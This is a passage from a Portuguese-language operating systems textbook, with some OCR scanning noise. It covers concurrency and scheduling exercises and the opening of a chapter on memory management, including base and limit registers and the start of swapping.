a cada segundo. Suponha que uma interrupção de relógio 
ocorra enquanto um thread está executando no sistema 
de tempo de execução. Qual problema poderia ocorrer? 
Você poderia sugerir uma maneira para solucioná-lo? 
Suponha que um sistema operacional não tem nada pa- 
recido com a chamada de sistema select para saber an- 
tecipadamente se é seguro ler de um arquivo, pipe ou 
dispositivo, mas ele permite que relógios de alarme se- 
jam configurados para interromper chamadas de sistema 
bloqueadas. É possível implementar um pacote de threads 
no espaço do usuário nessas condições? Discuta. 

A solução da espera ocupada usando a variável turn 
(Figura 2.23) funciona quando os dois processos estão 


24. 


25. 


26. 


27. 


28. 
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30. 


31. 


32. 
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executando em um multiprocessador de memória com- 
partilhada, isto é, duas CPUs compartilhando uma me- 
mória comum? 

A solução de Peterson para o problema da exclusão mú- 
tua mostrado na Figura 2.24 funciona quando o escalo- 
namento de processos é preemptivo? E quando ele é não 
preemptivo? 

O problema da inversão de prioridades discutido na Se- 
ção 2.3.4 acontece com threads de usuário? Por que ou 
por que não? 

Na Seção 2.3.4, uma situação com um processo de alta 
prioridade, H, e um processo de baixa prioridade, L, foi 
descrita, o que levou H a entrar em um laço infinito. O 
mesmo problema ocorre se o escalonamento circular for 
usado em vez do escalonamento de prioridade? Discuta. 
Em um sistema com threads, há uma pilha por thread 
ou uma pilha por processo quando threads de usuário 
são usados? E quando threads de núcleo são usados? 
Explique. 

Quando um computador está sendo desenvolvido, nor- 
malmente ele é primeiro simulado por um programa que 
executa uma instrução de cada vez. Mesmo multipro- 
cessadores são simulados de maneira estritamente se- 
quencial. É possível que uma condição de corrida ocorra 
quando não há eventos simultâneos como nesses casos? 
O problema produtor-consumidor pode ser ampliado 
para um sistema com múltiplos produtores e consumi- 
dores que escrevem (ou leem) para (ou de) um buffer 
compartilhado. Presuma que cada produtor e consumi- 
dor executem seu próprio thread. A solução apresentada 
na Figura 2.28 usando semáforos funcionaria para esse 
sistema? 

Considere a solução a seguir para o problema da exclu- 
são mútua envolvendo dois processos P0 e P1. Presuma 
que a variável turn seja inicializada para 0. O código do 
processo PO é apresentado a seguir. 


/* Outro codigo */ 

while (turn != 0) { }/* Nao fazer nada e esperar */ 
Critical Section /* .. . */ 

turn = 0; 


/* Outro codigo */ 


Para o processo P/, substitua O por | no código anterior. 
Determine se a solução atende a todas as condições exi- 
gidas para uma solução de exclusão mútua. 

Como um sistema operacional capaz de desabilitar inter- 
rupções poderia implementar semáforos? 

Mostre como semáforos contadores (isto é, semáforos 
que podem armazenar um valor arbitrário) podem ser 
implementados usando apenas semáforos binários e ins- 
truções de máquinas ordinárias. 
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Se um sistema tem apenas dois processos, faz sentido 
usar uma barreira para sincroniza-los? Por que ou por 
que nao? 

E possivel que dois threads no mesmo processo sincro- 
nizem usando um semaforo do nucleo se os threads sao 
implementados pelo nucleo? E se eles são implementa- 
dos no espaço do usuário? Presuma que nenhum thread 
em qualquer outro processo tenha acesso ao semáforo. 
Discuta suas respostas. 

A sincronização dentro de monitores usa variáveis de 
condição e duas operações especiais, wait e signal. Uma 
forma mais geral de sincronização seria ter uma única 
primitiva, waituntil, que tivesse um predicado booleano 
arbitrário como parâmetro. Desse modo, você poderia 
dizer, por exemplo, 


waituntil x<0ou y+Z<n 


A primitiva signal não seria mais necessária. Esse es- 
quema é claramente mais geral do que o de Hoare ou 
Brinch Hansen, mas não é usado. Por que não? (Dica: 
pense a respeito da implementação.) 

Uma lanchonete tem quatro tipos de empregados: (1) 
atendentes, que pegam os pedidos dos clientes; (2) co- 
zinheiros, que preparam a comida; (3) especialistas em 
empacotamento, que colocam a comida nas sacolas; e 
(4) caixas, que dão as sacolas para os clientes e recebem 
seu dinheiro. Cada empregado pode ser considerado um 
processo sequencial comunicante. Que forma de comu- 
nicação entre processos eles usam? Relacione esse mo- 
delo aos processos em UNIX. 

Suponha que temos um sistema de transmissão de men- 
sagens usando caixas de correio. Quando envia para uma 
caixa de correio cheia ou tenta receber de uma vazia, um 
processo não bloqueia. Em vez disso, ele recebe de volta 
um código de erro. O processo responde ao código de 
erro apenas tentando de novo, repetidas vezes, até ter 
sucesso. Esse esquema leva a condições de corrida? 

Os computadores CDC 6600 poderiam lidar com até 
10 processos de E/S simultaneamente usando uma for- 
ma interessante de escalonamento circular chamado de 
compartilhamento de processador. Um chaveamento de 
processo ocorreu após cada instrução, de maneira que 
a instrução 1 veio do processo 1, a instrução 2 do pro- 
cesse 2 etc. O chaveamento de processo foi realizado 
por um hardware especial e a sobrecarga foi zero. Se 
um processo necessitasse 7 segundos para completar na 
ausência da competição, de quanto tempo ele precisaria 
se o compartilhamento de processador fosse usado com 
n processos? 

Considere o fragmento de código C seguinte: 


void main( ) { 
fork( ); 
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41. 


42. 


43. 


44. 
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fork(); 
exit(); 


} 


Quantos processos filhos são criados com a execução 
desse programa? 

Escalonadores circulares em geral mantêm uma lista 
de todos os processos executáveis, com cada processo 
ocorrendo exatamente uma vez na lista. O que acontece- 
ria se um processo ocorresse duas vezes? Você consegue 
pensar em qualquer razão para permitir isso? 

É possível determinar se um processo é propenso a se 
tornar limitado pela CPU ou limitado pela E/S analisan- 
do o código fonte? Como isso pode ser determinado no 
tempo de execução? 

Explique como o valor quantum de tempo e tempo de 
chaveamento de contexto afetam um ao outro, em um 
algoritmo de escalonamento circular. 

Medidas de um determinado sistema mostraram que o 
processo típico executa por um tempo T antes de bloque- 
ar na E/S. Um chaveamento de processo exige um tempo 
S, que é efetivamente desperdiçado (sobrecarga). Para o 
escalonamento circular com quantum Q, dé uma formu- 
la para a eficiência da CPU para cada uma das situações 
a seguir: 

(a) Q=%. 

b) 0>T 

(c) S<O<T: 

(d) O=S. 

(e) O quase 0. 

Cinco tarefas estão esperando para serem executadas. 
Seus tempos de execução esperados são 9, 6, 3, 5 e X. 
Em qual ordem elas devem ser executadas para minimi- 
zar o tempo de resposta médio? (Sua resposta dependerá 
de X.) 

Cinco tarefas em lote, 4 até E, chegam a um centro de 
computadores quase ao mesmo tempo. Elas têm tempos 
de execução estimados de 10, 6, 2, 4 e 8 minutos. Suas 
prioridades (externamente determinadas) são 3, 5, 2, 1 
e 4, respectivamente, sendo 5 a mais alta. Para cada um 
dos algoritmos de escalonamento a seguir, determine o 
tempo de retorno médio do processo. Ignore a sobrecar- 
ga de chaveamento de processo. 

(a) Circular. 

(b) 
(c) Primeiro a chegar, primeiro a ser servido (siga a or- 
dem 10, 6, 2, 4, 8). 

Tarefa mais curta primeiro. 


Escalonamento por prioridade. 


(d) 
Para (a), presuma que o sistema é multiprogramado e 
que cada tarefa recebe sua porção justa de tempo na 
CPU. Para (b) até (d), presuma que apenas uma tarefa de 
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cada vez é executada, até terminar. Todas as tarefas sao 
completamente limitadas pela CPU. 

Um processo executando em CTSS precisa de 30 quanta 
para ser completo. Quantas vezes ele deve ser trocado 
para execução, incluindo a primeiríssima vez (antes de 
ter sido executado)? 

Considere um sistema de tempo real com duas chamadas 
de voz de periodicidade de 5 ms cada com um tempo 
de CPU por chamada de 1 ms, e um fluxo de video de 
periodicidade de 33 ms com tempo de CPU por chamada 
de 11 ms. Esse sistema é escalonável? 

Para o problema 47, será que outro fluxo de vídeo pode 
ser acrescentado e ter o sistema ainda escalonável? 

O algoritmo de envelhecimento com a = 1/2 está sendo 
usado para prever tempos de execução. As quatro exe- 
cuções anteriores, da mais antiga à mais recente, são 40, 
20, 40 e 15 ms. Qual é a previsão do próximo tempo? 
Um sistema de tempo real não crítico tem quatro eventos 
periódicos com períodos de 50, 100, 200 e 250 ms cada. 
Suponha que os quatro eventos exigem 35, 20, 10 e x 
ms de tempo da CPU, respectivamente. Qual é o maior 
valor de x para o qual o sistema é escalonável? 

No problema do jantar dos filósofos, deixe o protocolo 
a seguir ser usado: um filósofo de número par sempre 
pega o seu garfo esquerdo antes de pegar o direito; um 
filósofo de número ímpar sempre pega o garfo direito 
antes de pegar o esquerdo. Esse protocolo vai garantir 
uma operação sem impasse? 

Um sistema de tempo real precisa tratar de duas chama- 
das de voz onde cada uma executa a cada 6 ms e conso- 
me 1 ms de tempo da CPU por surto, mais um vídeo de 
25 quadros/s, com cada quadro exigindo 20 ms de tempo 
de CPU. Esse sistema é escalonável? 

Considere um sistema no qual se deseja separar política 
e mecanismo para o escalonamento de threads de nú- 
cleo. Proponha um meio de atingir essa meta. 

Na solução para o problema do jantar dos filósofos (Fi- 
gura 2.47), por que a variável de estado está configurada 
para HUNGRY na rotina take forks? 

Considere a rotina put forks na Figura 2.47. Suponha 
que a variável state/i] foi configurada para THINKING 
após as duas chamadas para teste, em vez de antes. 
Como essa mudança afetaria a solução? 

O problema dos leitores e escritores pode ser formulado 
de várias maneiras em relação a qual categoria de pro- 
cessos pode ser iniciada e quando. Descreva cuidadosa- 
mente três variações diferentes do problema, cada uma 
favorecendo (ou não favorecendo) alguma categoria de 
processos. Para cada variação, especifique o que acon- 
tece quando um leitor ou um escritor está pronto para 
acessar o banco de dados, e o que acontece quando um 
processo foi concluído. 
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Escreva um roteiro (script) shell que produz um arquivo 
de números sequenciais lendo o último número, adicio- 
nando 1 a ele, e então anexando-o ao arquivo. Execu- 
te uma instância do roteiro no segundo plano e uma no 
primeiro plano, cada uma acessando o mesmo arquivo. 
Quanto tempo leva até que a condição de corrida se ma- 
nifeste? Qual é a região crítica? Modifique o roteiro para 
evitar a corrida. (Dica: use 


In file file.lock 


para travar o arquivo de dados.) 

Presuma que você tem um sistema operacional que 
fornece semáforos. Implemente um sistema de mensa- 
gens. Escreva os procedimentos para enviar e receber 
mensagens. 

Solucione o problema do jantar de filósofos usando mo- 
nitores em vez de semáforos. 

Suponha que uma universidade queira mostrar o quão 
politicamente correta ela é, aplicando a doutrina “Sepa- 
rado mas igual é inerentemente desigual” da Suprema 
Corte dos EUA para o gênero, assim como a raça, termi- 
nando sua prática de longa data de banheiros segregados 
por gênero no campus. No entanto, como uma concessão 
para a tradição, ela decreta que se uma mulher está em 
um banheiro, outras mulheres podem entrar, mas ne- 
nhum homem, e vice-versa. Um sinal com uma placa 
móvel na porta de cada banheiro indica em quais dos três 
estados possíveis ele se encontra atualmente: 

e Vazio. 

e Mulheres presentes. 

e Homens presentes. 

Em alguma linguagem de programação de que você gos- 
te, escreva as seguintes rotinas: woman wants to enter, 
man wants to enter, woman leaves, man leaves. Você 
pode usar as técnicas de sincronização e contadores que 
quiser. 

Reescreva o programa da Figura 2.23 para lidar com 
mais do que dois processos. 

Escreva um problema produtor-consumidor que use 
threads e compartilhe de um buffer comum. No entan- 
to, não use semáforos ou quaisquer outras primitivas de 
sincronização para guardar as estruturas de dados com- 
partilhados. Apenas deixe cada thread acessá-las quando 
quiser. Use sleep e wakeup para lidar com condições de 
cheio e vazio. Veja quanto tempo leva para uma condição 
de corrida fatal ocorrer. Por exemplo, talvez você tenha 
o produtor imprimindo um número de vez em quando. 
Não imprima mais do que um número a cada minuto, 
pois a E/S poderia afetar as condições de corrida. 

Um processo pode ser colocado em uma fila circular 
mais de uma vez para dar a ele uma prioridade mais alta. 
Executar instâncias múltiplas de um programa, cada uma 
trabalhando em uma parte diferente de um pool de dados 
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pode ter o mesmo efeito. Primeiro escreva um programa 
que teste uma lista de números para primalidade. Então 
crie um método para permitir que múltiplas instâncias 
do programa executem ao mesmo tempo de tal maneira 
que duas instâncias do programa não trabalharão sobre 
o mesmo número. Você consegue de fato repassar mais 
rápido a lista executando múltiplas cópias do programa? 
Observe que seus resultados dependerão do que mais seu 
computador estiver fazendo; em um computador pessoal 
executando apenas instâncias desse programa você não 
esperaria uma melhora, mas em um sistema com outros 
processos, deve conseguir ficar com uma porção maior 
da CPU dessa maneira. 

O objetivo desse exercício é implementar uma solução 
com múltiplos threads para descobrir se um determinado 
número é um número perfeito. N é um número perfeito 
se a soma de todos os seus fatores, excluindo ele mes- 
mo, for N; exemplos são 6 e 28. A entrada é um intei- 
ro, N. A saída é verdadeira se o número for um número 
perfeito e falsa de outra maneira. O programa principal 
lerá os números N e P da linha de comando. O processo 
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principal gerará um conjunto de threads P. Os números 
de 1 a N serão divididos entre esses threads de maneira 
que dois threads não trabalhem sobre o mesmo número. 
Para cada número nesse conjunto, o thread determinará 
se o número é um fator de N; se for, ele acrescenta o 
número a um buffer compartilhado que armazena fato- 
res de N. O processo pai espera até que todos os threads 
terminem. Use a primitiva de sincronização apropriada 
aqui. O pai determinará então se o número de entrada é 
perfeito, isto é, se N é uma soma de todos os seus fato- 
res, então reportará em conformidade. (Nota: você pode 
fazer a computação mais rápido restringindo os números 
buscados de 1 até a raiz quadrada de N). 

Implemente um programa para contar a frequência de 
palavras em um arquivo de texto. O arquivo de texto é 
dividido em N segmentos. Cada segmento é processado 
por um thread em separado que produz a contagem de 
frequência intermediária para esse segmento. O proces- 
so principal espera até que todos os threads terminem; 
então ele calcula os dados de frequência de palavras con- 
solidados baseados na produção dos threads individuais. 





memória principal (RAM) é um recurso importan- 

te que deve ser cuidadosamente gerenciado. Ape- 

sar de o computador pessoal médio hoje em dia ter 

10.000 vezes mais memória do que o IBM 7094, 

o maior computador no mundo no início da déca- 
da de 1960, os programas estão ficando maiores mais 
rapido do que as memórias. Parafraseando a Lei de 
Parkinson, “programas tendem a expandir-se a fim de 
preencher a memória disponível para contê-los”. Neste 
capítulo, estudaremos como os sistemas operacionais 
criam abstrações a partir da memória e como eles as 
gerenciam. 

O que todo programador gostaria é de uma memória 
privada, infinitamente grande e rápida, que fosse não 
volátil também, isto é, não perdesse seus conteúdos 
quando faltasse energia elétrica. Aproveitando o ense- 
Jo, por que não torná-la barata, também? Infelizmente, 
a tecnologia ainda não produz essas memórias no mo- 
mento. Talvez você descubra como fazê-lo. 

Qual é a segunda escolha? Ao longo dos anos, as 
pessoas descobriram o conceito de hierarquia de me- 
mórias, em que os computadores têm alguns megabytes 
de memória cache volátil, cara e muito rápida, alguns 
gigabytes de memória principal volátil de velocidade e 
custo médios, e alguns terabytes de armazenamento em 
disco em estado sólido ou magnético não volátil, bara- 
to e lento, sem mencionar o armazenamento removível, 
com DVDs e dispositivos USB. É função do sistema 
operacional abstrair essa hierarquia em um modelo útil 
e então gerenciar a abstração. 

A parte do sistema operacional que gerencia (parte 
da) hierarquia de memórias é chamada de gerenciador 
de memória. Sua função é gerenciar eficientemente 
a memória: controlar quais partes estão sendo usadas, 


alocar memória para processos quando eles precisam 
dela e libera-la quando tiverem terminado. 

Neste capítulo investigaremos vários modelos dife- 
rentes de gerenciamento de memória, desde os muito 
simples aos altamente sofisticados. Dado que gerenciar 
o nível mais baixo de memória cache é feito normal- 
mente pelo hardware, o foco deste capítulo estará no 
modelo de memória principal do programador e como 
ela pode ser gerenciada. As abstrações para — e o ge- 
renciamento do — armazenamento permanente (o dis- 
co), serão tratados no próximo capítulo. Examinaremos 
primeiro os esquemas mais simples possíveis e então 
gradualmente avançaremos para os esquemas cada vez 
mais elaborados. 


3.1 Sem abstração de memória 


A abstração de memória mais simples é não ter abs- 
tração alguma. Os primeiros computadores de grande 
porte (antes de 1960), os primeiros minicomputadores 
(antes de 1970) e os primeiros computadores pessoais 
(antes de 1980) não tinham abstração de memória. Cada 
programa apenas via a memória física. Quando um pro- 
grama executava uma instrução como 


MOV REGISTER1,1000 


o computador apenas movia o conteúdo da memória 
física da posição 1000 para REGISTER1. Assim, o 
modelo de memória apresentado ao programador era 
apenas a memória física, um conjunto de endereços 
de 0 a algum maximo, cada endereço correspondendo 
a uma célula contendo algum número de bits, normal- 
mente oito. 
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Nessas condições, não era possível ter dois progra- 
mas em execução na memória ao mesmo tempo. Se o 
primeiro programa escrevesse um novo valor para, di- 
gamos, a posição 2000, esse valor apagaria qualquer va- 
lor que o segundo programa estivesse armazenando ali. 
Nada funcionaria e ambos os programas entrariam em 
colapso quase que imediatamente. 

Mesmo com o modelo de memória sendo apenas da 
memória física, várias opções são possíveis. Três varia- 
ções são mostradas na Figura 3.1. O sistema operacio- 
nal pode estar na parte inferior da memória em RAM 
(Random Access Memory — memória de acesso ale- 
atório), como mostrado na Figura 3.1(a), ou pode estar 
em ROM (Read-Only Memory — memória apenas para 
leitura) no topo da memória, como mostrado na Figura 
3.1(b), ou os drivers do dispositivo talvez estejam no 
topo da memória em um ROM e o resto do sistema em 
RAM bem abaixo, como mostrado na Figura 3.1(c). 
O primeiro modelo foi usado antes em computadores 
de grande porte e minicomputadores, mas raramente é 
usado. O segundo modelo é usado em alguns computa- 
dores portáteis e sistemas embarcados. O terceiro mo- 
delo foi usado pelos primeiros computadores pessoais 
(por exemplo, executando o MS-DOS), onde a porção 
do sistema no ROM é chamada de BIOS (Basic Input 
Output System — sistema básico de E/S). Os modelos 
(a) e (c) têm a desvantagem de que um erro no programa 
do usuário pode apagar por completo o sistema opera- 
cional, possivelmente com resultados desastrosos. 

Quando o sistema está organizado dessa maneira, 
geralmente apenas um processo de cada vez pode es- 
tar executando. Tão logo o usuário digita um comando, 
o sistema operacional copia o programa solicitado do 
disco para a memória e o executa. Quando o proces- 
so termina, o sistema operacional exibe um prompt de 
comando e espera por um novo comando do usuário. 
Quando o sistema operacional recebe o comando, ele 


carrega um programa novo para a memória, sobrescre- 
vendo o primeiro. 

Uma maneira de se conseguir algum paralelismo em 
um sistema sem abstração de memória é programá-lo 
com múltiplos threads. Como todos os threads em um 
processo devem ver a mesma imagem da memória, o 
fato de eles serem forçados a fazê-lo não é um problema, 
Embora essa ideia funcione, ela é de uso limitado, pois 
o que muitas vezes as pessoas querem é que programas 
não relacionados estejam executando ao mesmo tempo, 
algo que a abstração de threads não realiza. Além disso, 
qualquer sistema que seja tão primitivo a ponto de não 
proporcionar qualquer abstração de memória é impro- 
vável que proporcione uma abstração de threads. 


Executando múltiplos programas sem uma 
abstração de memória 


No entanto, mesmo sem uma abstração de memó- 
ria, é possível executar múltiplos programas ao mesmo 
tempo. O que um sistema operacional precisa fazer é 
salvar o conteúdo inteiro da memória em um arquivo de 
disco, então introduzir e executar o programa seguinte. 
Desde que exista apenas um programa de cada vez na 
memória, não há conflitos. Esse conceito (swapping — 
troca de processos) será discutido a seguir. 

Com a adição de algum hardware especial, é pos- 
sível executar múltiplos programas simultaneamente, 
mesmo sem swapping. Os primeiros modelos da IBM 
360 solucionaram o problema como a seguir. A memó- 
ria foi dividida em blocos de 2 KB e a cada um foi de- 
signada uma chave de proteção de 4 bits armazenada 
em registradores especiais dentro da CPU. Uma máqui- 
na com uma memória de 1 MB necessitava de apenas 
512 desses registradores de 4 bits para um total de 256 
bytes de armazenamento de chaves. A PSW (Program 
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Status Word — palavra de estado do programa) também 
continha uma chave de 4 bits. O hardware do 360 impe- 
dia qualquer tentativa de um processo em execução de 
acessar a memória com um código de proteção diferente 
do da chave PSW. Visto que apenas o sistema operacio- 
nal podia mudar as chaves de proteção, os processos do 
usuário eram impedidos de interferir uns com os outros 
e com o sistema operacional em si. 

No entanto, essa solução tinha um problema impor- 
tante, descrito na Figura 3.2. Aqui temos dois progra- 
mas, cada um com 16 KB de tamanho, como mostrado 
nas figuras 3.2(a) e (b). O primeiro está sombreado para 
indicar que ele tem uma chave de memória diferente da 
do segundo. O primeiro programa começa com um salto 
para o endereço 24, que contém uma instrução MOV. O 
segundo inicia saltando para o endereço 28, que contém 
uma instrução CMP. As instruções que não são relevan- 
tes para essa discussão não são mostradas. Quando os 
dois programas são carregados consecutivamente na 
memória, começando no endereço 0, temos a situação 
da Figura 3.2(c). Para esse exemplo, presumimos que 
o sistema operacional está na região alta da memória e 
assim não é mostrado. 

Após os programas terem sido carregados, eles 
podem ser executados. Dado que eles têm chaves de 
memória diferentes, nenhum dos dois pode danificar 
o outro. Mas o problema é de uma natureza diferente. 
Quando o primeiro programa inicializa, ele executa a 
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instrução JMP 24, que salta para a instrução, como es- 
perado. Esse programa funciona normalmente. 

No entanto, após o primeiro programa ter executa- 
do tempo suficiente, o sistema operacional pode decidir 
executar o segundo programa, que foi carregado acima 
do primeiro, no endereço 16.384. A primeira instrução 
executada é JMP 28, que salta para a instrução ADD no 
primeiro programa, em vez da instrução CMP esperada. 
É muito provável que o programa entre em colapso bem 
antes de 1 s. 

O problema fundamental aqui é que ambos os pro- 
gramas referenciam a memória física absoluta, e não é 
isso que queremos, de forma alguma. O que queremos 
é cada programa possa referenciar um conjunto privado 
de endereços local a ele. Mostraremos como isso pode 
ser conseguido. O que o IBM 360 utilizou como solu- 
ção temporária foi modificar o segundo programa dina- 
micamente enquanto o carregava na memória, usando 
uma técnica conhecida como realocação estática. Ela 
funcionava da seguinte forma: quando um programa es- 
tava carregado no endereço 16.384, a constante 16.384 
era acrescentada a cada endereço de programa durante 
o processo de carregamento (de maneira que “JMP 28” 
tornou-se “JMP 16.412” etc.). Conquanto esse mecanis- 
mo funcione se feito de maneira correta, ele não é uma 
solução muito geral e torna lento o carregamento. Além 
disso, exige informações adicionais em todos os pro- 
gramas executáveis cujas palavras contenham ou não 




















































































































(FIGURA 3.2] Exemplo do problema de realocação. (a) Um programa de 16 KB. (b) Outro programa de 16 KB. (c) Os dois programas 
carregados consecutivamente na memória. 
0 32764 
CMP 16412 
16408 
16404 
16400 
16396 
16392 
16388 
JMP 28 16384 
0 16380 0 16380 0 16380 
ADD 28 CMP 28 ADD 28 
MOV 24 24 MOV 24 
20 20 20 
16 16 16 
12 12 12 
8 8 8 
4 4 4 
JMP 24 0 JMP 28 0 JMP 24 0 
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endereços (realocáveis). Afinal, o “28” na Figura 3.2(b) 
deve ser realocado, mas uma instrução como 


MOV REGISTER!, 28 


que move o numero 28 para REGISTER! não deve ser 
realocada. O carregador precisa de alguma maneira di- 
zer o que é um endereço e o que é uma constante. 

Por fim, como destacamos no Capítulo 1, a história 
tende a repetir-se no mundo dos computadores. Embo- 
ra o endereçamento direto de memória física seja ape- 
nas uma memória distante nos computadores de grande 
porte, minicomputadores, computadores de mesa, no- 
tebooks e smartphones, a falta de uma abstração de 
memória ainda é comum em sistemas embarcados e de 
cartões inteligentes. Dispositivos como rádios, máqui- 
nas de lavar roupas e fornos de micro-ondas estão todos 
cheios de software (em ROM), e na maioria dos casos o 
software se endereça à memória absoluta. Isso funciona 
porque todos os programas são conhecidos antecipada- 
mente e os usuários não são livres para executar o seu 
próprio software na sua torradeira. 

Enquanto sistemas embarcados sofisticados (como 
smartphones) têm sistemas operacionais elaborados, os 
mais simples não os têm. Em alguns casos, há um siste- 
ma operacional, mas é apenas uma biblioteca que está 
vinculada ao programa de aplicação e fornece chama- 
das de sistema para desempenhar E/S e outras tarefas 
comuns. O sistema operacional e-Cos é um exemplo 
comum de um sistema operacional como biblioteca. 


3.2 Uma abstração de memória: espaços 
de endereçamento 


Como um todo, expor a memória física a proces- 
sos tem várias desvantagens importantes. Primeiro, se 
os programas do usuário podem endereçar cada byte 
de memória, eles podem facilmente derrubar o sistema 
operacional, intencionalmente ou por acidente, provo- 
cando uma parada total no sistema (a não ser que exista 
um hardware especial como o esquema de bloqueio e 
chave do IBM 360). Esse problema existe mesmo que 
só um programa do usuário (aplicação) esteja executan- 
do. Segundo, com esse modelo, é difícil ter múltiplos 
programas executando ao mesmo tempo (revezando- 
-se, se houver apenas uma CPU). Em computadores 
pessoais, é comum haver vários programas abertos ao 
mesmo tempo (um processador de texto, um programa 
de e-mail, um navegador da web), um deles tendo o 
foco atual, mas os outros sendo reativados ao clique de 
um mouse. Como essa situação é difícil de ser atingida 


quando não há abstração da memória física, algo tinha 
de ser feito. 


3.2.1 A noção de um espaço de endereçamento 


Dois problemas têm de ser solucionados para per- 
mitir que múltiplas aplicações estejam na memória ao 
mesmo tempo sem interferir umas com as outras: pro- 
teção e realocação. Examinamos uma solução primiti- 
va para a primeira usada no IBM 360: rotular blocos 
de memória com uma chave de proteção e comparar 
a chave do processo em execução com aquele de toda 
palavra de memória buscada. No entanto, essa aborda- 
gem em si não soluciona o segundo problema, embora 
ele possa ser resolvido realocando programas à medida 
que eles são carregados, mas essa é uma solução lenta 
e complicada. 

Uma solução melhor é inventar uma nova abstração 
para a memória: o espaço de endereçamento. Da mes- 
ma forma que o conceito de processo cria uma espécie 
de CPU abstrata para executar os programas, o espaço 
de endereçamento cria uma espécie de memória abs- 
trata para abrigá-los. Um espaço de endereçamento 
é o conjunto de endereços que um processo pode usar 
para endereçar a memória. Cada processo tem seu pró- 
prio espaço de endereçamento, independente daqueles 
pertencentes a outros processos (exceto em algumas 
circunstâncias especiais onde os processos querem 
compartilhar seus espaços de endereçamento). 

O conceito de um espaço de endereçamento é muito 
geral e ocorre em muitos contextos. Considere os nú- 
meros de telefones. Nos Estados Unidos e em muitos 
outros países, um número de telefone local costuma 
ter 7 dígitos. Desse modo, o espaço de endereçamento 
para números de telefone vai de 0.000.000 a 9.999.999, 
embora alguns números, como aqueles começando 
com 000, não sejam usados. Com o crescimento dos 
smartphones, modems e máquinas de fax, esse espaço 
está se tornando pequeno demais, e mais dígitos preci- 
sam ser usados. O espaço de endereçamento para portas 
de E/S no x86 varia de 0 a 16.383. Endereços de IPv4 
são números de 32 bits, de maneira que seu espaço de 
endereçamento varia de 0 a 2º2— 1 (de novo, com alguns 
números reservados). 

Espaços de endereçamento não precisam ser numé- 
ricos. O conjunto de domínios da internet .com também 
é um espaço de endereçamento. Ele consiste em todas 
as cadeias de comprimento 2 a 63 caracteres que podem 
ser feitas usando letras, números e hifens, seguidas por 
.com. A essa altura você deve ter compreendido. É algo 
relativamente simples. 


Algo um tanto mais difícil é como dar a cada pro- 
grama seu próprio espaço de endereçamento, de ma- 
neira que o endereço 28 em um programa significa 
uma localização física diferente do endereço 28 em 
outro programa. A seguir discutiremos uma maneira 
simples que costumava ser comum, mas caiu em de- 
suso por causa da capacidade de se inserirem esque- 
mas muito mais complicados (e melhores) em chips de 
CPUs modernos. 


Registradores base e registradores limite 


Essa solução simples usa uma versão particular- 
mente simples da realocação dinâmica. O que ela faz 
é mapear o espaço de endereçamento de cada proces- 
so em uma parte diferente da memória física de uma 
maneira simples. A solução clássica, que foi usada em 
máquinas desde o CDC 6600 (o primeiro supercom- 
putador do mundo) ao Intel 8088 (o coração do PC 
IBM original), é equipar cada CPU com dois registra- 
dores de hardware especiais, normalmente chamados 
de registradores base e registradores limite. Quando 
esses registradores são usados, os programas são car- 
regados em posições de memória consecutivas sempre 
que haja espaço e sem realocação durante o carrega- 
mento, como mostrado na Figura 3.2(c). Quando um 
processo é executado, o registrador base é carregado 
com o endereço físico onde seu programa começa 
na memória e o registrador limite é carregado com o 
comprimento do programa. Na Figura 3.2(c), os valo- 
res base e limite que seriam carregados nesses regis- 
tradores de hardware quando o primeiro programa é 
executado são 0 e 16.384, respectivamente. Os valores 
usados quando o segundo programa é executado são 
16.384 e 32.768, respectivamente. Se um terceiro pro- 
grama de 16 KB fosse carregado diretamente acima 
do segundo e executado, os registradores base e limite 
seriam 32.768 e 16.384. 

Toda vez que um processo referencia a memória, 
seja para buscar uma instrução ou ler ou escrever uma 
palavra de dados, o hardware da CPU automaticamen- 
te adiciona o valor base ao endereço gerado pelo pro- 
cesso antes de enviá-lo para o barramento de memória. 
Ao mesmo tempo, ele confere se o endereço oferecido 
é igual ou maior do que o valor no registrador limite, 
caso em que uma falta é gerada e o acesso é abortado. 
Desse modo, no caso da primeira instrução do segun- 
do programa na Figura 3.2(c), o processo executa uma 
instrução 


JMP 28 
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mas o hardware a trata como se ela fosse 
JMP 16412 


portanto ela chega à instrução CMP como esperado. As 
configurações dos registradores base e limite durante 
a execução do segundo programa da Figura 3.2(c) são 
mostradas na Figura 3.3. 

Usar registradores base e limite é uma maneira fácil 
de dar a cada processo seu próprio espaço de endereça- 
mento privado, pois cada endereço de memória gerado 
automaticamente tem o conteúdo do registrador base 
adicionado a ele antes de ser enviado para a memória. 
Em muitas implementações, os registradores base e li- 
mite são protegidos de tal maneira que apenas o sistema 
operacional pode modificá-los. Esse foi o caso do CDC 
6600, mas não no Intel 8088, que não tinha nem um re- 
gistrador limite. Ele tinha múltiplos registradores base, 
permitindo programar textos e dados, por exemplo, 
para serem realocados independentemente, mas não 
oferecia proteção contra referências à memória além da 
capacidade. 

Uma desvantagem da realocação usando registrado- 
res base e limite é a necessidade de realizar uma adi- 
ção e uma comparação em cada referência de memória. 
Comparações podem ser feitas rapidamente, mas adi- 
ções são lentas por causa do tempo de propagação do 
transporte (carry-propagation time), a não ser que cir- 
cuitos de adição especiais sejam usados. 


lc) EEJ Registradores base ou limite podem ser usados 
para dar a cada processo um espaço de 
endereçamento em separado. 
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3.2.2 Troca de processos (Swapping) 


Se a memória física do computador for grande o su- 
ficiente para armazenar todos os processos, os esque- 
mas descritos até aqui bastarão de certa forma. Mas 
na prática, o montante total de RAM demandado por 
todos os processos é muitas vezes bem maior do que 
pode ser colocado na memória. Em sistemas típicos 
Windows, OS X ou Linux, algo como 50-100 proces- 
sos ou mais podem ser iniciados tão logo o computa- 
dor for ligado. Por exemplo, quando uma aplicação do 
Windows é instalada, ela muitas vezes emite coman- 
dos de tal forma que em inicializações subsequentes 
do sistema, um processo será iniciado somente para 
conferir se existem atualizações para as aplicações. 
Um processo desses pode facilmente ocupar 5-10 
MB de memória. Outros processos de segundo plano 
conferem se há e-mails, conexões de rede chegando 
e muitas outras coisas. E tudo isso antes de o primei- 
ro programa do usuário ter sido iniciado. Programas 
sérios de aplicação do usuário, como o Photoshop, 
podem facilmente exigir 500 MB apenas para serem 
inicializados e muitos gigabytes assim que começam 
a processar dados. Em consequência, manter todos os 
processos na memória o tempo inteiro exige um mon- 
tante enorme de memória e é algo que não pode ser 
feito se ela for insuficiente. 

Duas abordagens gerais para lidar com a sobrecarga 
de memória foram desenvolvidas ao longo dos anos. A 
estratégia mais simples, chamada de swapping (troca 
de processos), consiste em trazer cada processo em sua 
totalidade, executá-lo por um tempo e então colocá-lo 
de volta no disco. Processos ociosos estão armazena- 
